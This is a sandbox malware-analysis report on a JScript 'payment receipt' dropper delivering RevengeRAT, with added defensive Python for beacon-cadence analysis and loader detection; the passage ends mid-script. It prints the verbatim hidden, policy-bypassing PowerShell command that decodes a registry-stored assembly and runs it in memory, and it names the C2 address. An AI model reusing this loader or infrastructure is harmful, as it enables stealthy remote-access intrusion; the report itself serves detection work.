https://contoso.com/License  powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/Icon  powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp
Contacted IP (IP / domain / country / ASN / ASN name / malicious)
38.51.135.44  unknown  United States  174  COGENT-174US  true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578395
Start date and time: 2024-12-19 16:41:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: comprovante de pagamento.js
Detection: MAL
Classification: mal100.troj.expl.evad.winJS@4/3@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 13
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behaviour information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: comprovante de pagamento.js
Time      Type             Description
10:42:02  API Interceptor  3591158x Sleep call for process: powershell.exe modified
Context for the contacted ASN (match: COGENT-174US): other samples seen talking to the same ASN (sample / detection / threat name / contacted IP). This is an ASN overlap only; AS174 is a large transit network, so these Mirai samples share a carrier with the RevengeRAT C2, not infrastructure.

arm7.nn-20241219-1505.elf  malicious  Mirai, Okiru  206.1.243.67
arm5.nn-20241219-1505.elf  malicious  Mirai, Okiru  38.198.210.196
x86_32.nn.elf  malicious  Mirai, Okiru  149.51.56.62
powerpc.nn.elf  malicious  Mirai, Okiru  149.122.211.39
sh4.nn.elf  malicious  Mirai, Okiru  167.141.20.244
arm.nn.elf  malicious  Mirai, Okiru  38.216.49.233
x86_32.nn.elf  malicious  Mirai, Okiru  206.250.148.68
mips.nn.elf  malicious  Mirai, Okiru  38.57.123.8
sparc.nn.elf  malicious  Mirai, Okiru  167.141.205.77
powerpc.nn.elf  malicious  Mirai, Okiru  38.165.175.31
Dropped files (3)

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11887
Entropy (8bit): 4.901437212034066
Encrypted: false
SSDEEP: 192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
MD5: ED30A738A05A68D6AB27771BD846A7AA
SHA1: 6AFCE0F6E39A9A59FF54956E1461F09747B57B44
SHA-256: 17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
SHA-512: 183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
(PSMODULECACHE magic: this is PowerShell's module analysis cache, written by the host itself, not by the malware.)

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
(The two 60-byte files are the script-policy test files PowerShell writes on every start to probe AppLocker; they are identical in content and benign.)
File type: Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Entropy (8bit): 3.456824357283798
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 64.44%
• MP3 audio (1001/1) 32.22%
• Lumena CEL bitmap (63/63) 2.03%
• Corel Photo Paint (41/41) 1.32%
File name: comprovante de pagamento.js
File size: 119'582 bytes
MD5: 0c3e47c0fb0d5a289fded25fd9746817
SHA1: 2117b82b1724a2f146ffd015b50ce45c63d7fb87
SHA256: 2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d
SHA512: bf8b2895fa9cf32c651d67ff68c3156dfd2f32e4fc9308ec5a190eaf942816feae1357086b150442c4359619356cf6cf3bd4e9bcf8d866b52c51b0c3978133ad
SSDEEP: 1536:D12+GPp0PG/6Rn/T5d1XtQpm7GOzYCtFA:p2+GB0PG/sn/T5dt+IdG
TLSH: C5C380AC7CE7A03E6255C995A7D0516BF429639F520E3B9618C3C3D9472360BE4A8F3C
File Content Preview (UTF-16LE; the original rendering shows each NUL byte as a dot, decoded here): var _0x585002=_0x1675;(function(_0x5535d8,_0x1f8300){var _0x10907e=_0x1675,_0x15ff96=_0x5535d8();while(!![]){try{var _0x440998=
(The _0x-named identifiers, the self-invoking function that rotates a string array and the while(!![]){try{...}} loop are the characteristic output of javascript-obfuscator-style string-array obfuscation. The entire script sits on one line, and because it is UTF-16 rather than ASCII, an ASCII-only string scan sees no readable code, which also explains the MP3 guess from TrID.)
Icon Hash: 68d69b8bb6aa9a86
Suricata alerts (timestamp / SID / signature / severity / source IP:port / destination IP:port / protocol)
2024-12-19T16:42:07.244342+0100  2841113  ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4                  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:42:37.253666+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:43:07.252902+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:43:37.257973+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:43:51.502758+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:43:55.674603+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:43:55.862048+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
2024-12-19T16:44:11.610122+0100  2035885  ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2  1  192.168.2.4:49730  38.51.135.44:333  TCP
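An added beacon-cadence check over the alerts above (example code written for this page, not part of the Joe Sandbox report or of Suricata). It takes the eight alert timestamps for the single flow to 38.51.135.44:333, bins the gaps between consecutive alerts, reports the dominant period and how many gaps fall into it, and marks where the steady cadence stops. The 1-second binning and the threshold of three regular gaps are assumptions of this example, not values from the report.

```python
"""Beacon-cadence check over the Suricata alerts in this report.

Added example, not part of the Joe Sandbox report or of Suricata. ALERTS are
the eight alert rows from the report (timestamp, SID, signature) for the flow
192.168.2.4:49730 -> 38.51.135.44:333/TCP; the 1-second binning and the
"three regular intervals make a beacon" threshold are assumptions.
"""
from collections import Counter
from datetime import datetime

KEEPALIVE = "ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2"
ALERTS = [
    ("2024-12-19T16:42:07.244342+0100", 2841113, "ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4"),
    ("2024-12-19T16:42:37.253666+0100", 2035885, KEEPALIVE),
    ("2024-12-19T16:43:07.252902+0100", 2035885, KEEPALIVE),
    ("2024-12-19T16:43:37.257973+0100", 2035885, KEEPALIVE),
    ("2024-12-19T16:43:51.502758+0100", 2035885, KEEPALIVE),
    ("2024-12-19T16:43:55.674603+0100", 2035885, KEEPALIVE),
    ("2024-12-19T16:43:55.862048+0100", 2035885, KEEPALIVE),
    ("2024-12-19T16:44:11.610122+0100", 2035885, KEEPALIVE),
]
FLOW = ("192.168.2.4", 49730, "38.51.135.44", 333, "TCP")  # identical on every row


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S.%f%z")


def inter_arrival(alerts) -> list:
    """Seconds between consecutive alerts, in report order."""
    times = [parse_ts(ts) for ts, _, _ in alerts]
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def dominant_period(deltas, bin_width: float = 1.0):
    """Bin the gaps and return (period, hits) for the fullest bin; (None, 0)
    when there are no gaps to bin."""
    if not deltas:
        return None, 0
    bins = Counter(round(d / bin_width) * bin_width for d in deltas)
    return bins.most_common(1)[0]


def beacon_summary(alerts, min_hits: int = 3) -> dict:
    """Describe one flow's alert stream: dominant period, how many gaps sit on
    it, and the first alert after which the cadence breaks."""
    deltas = inter_arrival(alerts)
    period, hits = dominant_period(deltas)
    break_idx = next((i for i, d in enumerate(deltas) if round(d) != period), None)
    return {
        "flow": "%s:%d -> %s:%d/%s" % FLOW,
        "alerts": len(alerts),
        "checkin_sids": sorted({sid for _, sid, sig in alerts if "Checkin" in sig}),
        "keepalive_sids": sorted({sid for _, sid, sig in alerts if "Keep-Alive" in sig}),
        "period_s": period,
        "regular_intervals": hits,
        "cadence_breaks_after_alert": None if break_idx is None else break_idx + 1,
        "is_beacon": hits >= min_hits,
    }


if __name__ == "__main__":
    for key, value in beacon_summary(ALERTS).items():
        print(f"{key}: {value}")
```

On the report's data the function finds a 30-second period for the first three gaps and a cadence break after the fourth alert (gaps of about 14 s, 4 s, 0.2 s and 16 s follow). The same routine applied to a fleet's alert or NetFlow data is what separates a keep-alive timer from a burst of unrelated hits, which a count of alerts alone cannot do.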
TCP packets (192.168.2.4:49730 to 38.51.135.44:333 and back)

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 16:42:06.584393024 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:06.704333067 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:06.704468966 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:07.244342089 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:07.365320921 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:17.150271893 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:17.156689882 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:17.277621031 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:17.588486910 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:17.589925051 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:17.709687948 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:17.709770918 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:17.830095053 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:32.168153048 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:32.170531988 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:32.290380001 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:32.606432915 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:32.608499050 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:32.728193998 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:32.728277922 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:32.848037004 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:37.253665924 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:37.373641014 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:47.178426027 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:47.180571079 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:47.300549984 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:47.604844093 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:47.606214046 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:47.726068020 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:42:47.726252079 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:42:47.845817089 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:02.200062990 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:02.202353954 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:02.322484016 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:02.629441977 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:02.631380081 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:02.751528978 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:02.751844883 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:02.872131109 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:07.252902031 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:07.373034954 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:17.218842983 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:17.224149942 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:17.344572067 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:17.648454905 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:17.650149107 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:17.770350933 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:17.770545006 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:17.890979052 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:32.238832951 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:32.240516901 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:32.360510111 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:32.664875984 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:32.667660952 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:32.787492037 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:32.789910078 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:32.909531116 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:37.257972956 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:37.377954960 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:47.263384104 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:47.269270897 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:47.389233112 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:47.693115950 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:47.695574999 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:47.816297054 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:47.816502094 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:47.936373949 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:51.502758026 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:51.624613047 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:55.674602985 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:55.794239998 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:43:55.862047911 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:43:55.981976986 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:44:02.287950039 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:44:02.289738894 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:44:02.409796000 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:44:02.804652929 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:44:02.813679934 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:44:02.934144974 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:44:02.934402943 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:44:03.054610968 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
Dec 19, 2024 16:44:11.610121965 CET | 49730 | 333 | 192.168.2.4 | 38.51.135.44
Dec 19, 2024 16:44:11.730099916 CET | 333 | 49730 | 38.51.135.44 | 192.168.2.4
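The packet table above is more useful than the IDS alerts for characterising this C2 channel, because it shows who speaks first in each exchange. The following Python is an added example, not part of the Joe Sandbox report: it regroups the table's packets into bursts, records which side opened each burst, and estimates the period of each side's bursts. The timestamps and directions are copied from the table (at millisecond precision; C is 192.168.2.4:49730 to 38.51.135.44:333, S the reverse). The 2-second burst gap and the 5% tolerance are parameters chosen here, not values from the report.

```python
"""Beacon-cadence analysis of the RevengeRAT TCP session in this report (added example)."""
from datetime import datetime
from statistics import median

# Packet timeline copied from the report's TCP table, truncated to milliseconds.
# Suffix C = client -> server (192.168.2.4:49730 -> 38.51.135.44:333), S = server -> client.
PACKETS = """
16:42:06.584C 16:42:06.704S 16:42:06.704C 16:42:07.244C 16:42:07.365S 16:42:17.150S
16:42:17.156C 16:42:17.277S 16:42:17.588S 16:42:17.589C 16:42:17.709S 16:42:17.709C
16:42:17.830S 16:42:32.168S 16:42:32.170C 16:42:32.290S 16:42:32.606S 16:42:32.608C
16:42:32.728S 16:42:32.728C 16:42:32.848S 16:42:37.253C 16:42:37.373S 16:42:47.178S
16:42:47.180C 16:42:47.300S 16:42:47.604S 16:42:47.606C 16:42:47.726S 16:42:47.726C
16:42:47.845S 16:43:02.200S 16:43:02.202C 16:43:02.322S 16:43:02.629S 16:43:02.631C
16:43:02.751S 16:43:02.751C 16:43:02.872S 16:43:07.252C 16:43:07.373S 16:43:17.218S
16:43:17.224C 16:43:17.344S 16:43:17.648S 16:43:17.650C 16:43:17.770S 16:43:17.770C
16:43:17.890S 16:43:32.238S 16:43:32.240C 16:43:32.360S 16:43:32.664S 16:43:32.667C
16:43:32.787S 16:43:32.789C 16:43:32.909S 16:43:37.257C 16:43:37.377S 16:43:47.263S
16:43:47.269C 16:43:47.389S 16:43:47.693S 16:43:47.695C 16:43:47.816S 16:43:47.816C
16:43:47.936S 16:43:51.502C 16:43:51.624S 16:43:55.674C 16:43:55.794S 16:43:55.862C
16:43:55.981S 16:44:02.287S 16:44:02.289C 16:44:02.409S 16:44:02.804S 16:44:02.813C
16:44:02.934S 16:44:02.934C 16:44:03.054S 16:44:11.610C 16:44:11.730S
"""


def parse_packets(text, day="2024-12-19"):
    """Turn 'HH:MM:SS.mmmD' tokens into (datetime, direction) pairs."""
    return [(datetime.strptime(f"{day} {tok[:-1]}", "%Y-%m-%d %H:%M:%S.%f"), tok[-1])
            for tok in text.split()]


def bursts(packets, gap=2.0):
    """Split the timeline into bursts: a silence longer than `gap` seconds starts a new
    burst. Returns (start_time, initiator) per burst, the initiator being whichever side
    sent the burst's first packet (the SYN counts as the client opening the first burst)."""
    starts, last = [], None
    for ts, who in packets:
        if last is None or (ts - last).total_seconds() > gap:
            starts.append((ts, who))
        last = ts
    return starts


def cadence(times, tol=0.05):
    """Estimate the dominant period of a list of burst start times.

    Every observed gap is tried as a candidate period; the candidate that the most gaps
    fall within +-tol of wins. Returns (period, score): period is the median of the gaps
    that agree with the winner, score the fraction of all gaps that agree (1.0 = every
    gap is the same length, i.e. a fixed timer with no jitter)."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return None, 0.0
    inliers = lambda p: [g for g in gaps if abs(g - p) <= tol * p]
    best = max(gaps, key=lambda p: len(inliers(p)))
    agree = inliers(best)
    return round(median(agree), 3), round(len(agree) / len(gaps), 2)


def analyze(text):
    """Per initiator: (burst count, dominant period in seconds, regularity score)."""
    by_side = {"C": [], "S": []}
    for start, who in bursts(parse_packets(text)):
        by_side[who].append(start)
    return {who: (len(t),) + cadence(t) for who, t in by_side.items()}


if __name__ == "__main__":
    for who, (n, period, score) in analyze(PACKETS).items():
        side = "client-initiated" if who == "C" else "server-initiated"
        print(f"{side}: {n} bursts, period ~{period}s, {score:.0%} of gaps agree")
```

Run on the report's data this separates two timers: the server polls the implant every 15.02 s with no measurable jitter (8 bursts, all gaps within tolerance), while the client's own bursts carry the 30 s keep-alive that the ET signature fires on plus a few irregular, command-driven exchanges late in the session. A server-side timer that stable is a better long-term detection handle than the client keep-alive, since it survives the operator changing the keep-alive interval.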


                                  Target ID:0
                                  Start time:10:41:58
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js"
                                  Imagebase:0x7ff6e4420000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:10:42:00
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_RevengeRAT, Description: RevengeRAT and variants payload, Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false
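The two process records above are the whole infection chain: WScript runs the JScript dropper, which stores a base64-encoded .NET assembly in a registry value and then launches a hidden, policy-bypassing PowerShell that reads it back, decodes it, loads it into the current AppDomain and invokes its entry point, so nothing touches disk after the .js. The following Python is an added example, not part of the Joe Sandbox report: it scores process-creation records the way a Sysmon/EDR rule would and pulls the registry key and value name out of the command line so a responder knows where the payload sits on the host. The event records are constructed; only the first command line is copied verbatim from Target ID 1, and the field names follow Sysmon's Event ID 1 by assumption.

```python
"""Score process-creation events for the registry-backed PowerShell reflective loader
seen in this report (added example; EVENTS are constructed test records)."""
import re

EVENTS = [
    {   # the chain recorded in this report (Target ID 0 -> Target ID 1), copied verbatim
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"''',
    },
    {   # constructed: hidden, policy-bypassing admin script; worth a look, but not a loader
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Scripts\backup.ps1",
    },
    {   # constructed: ordinary interactive use
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Temp"',
    },
]

# Each indicator is one building block of the loader; PowerShell accepts abbreviated
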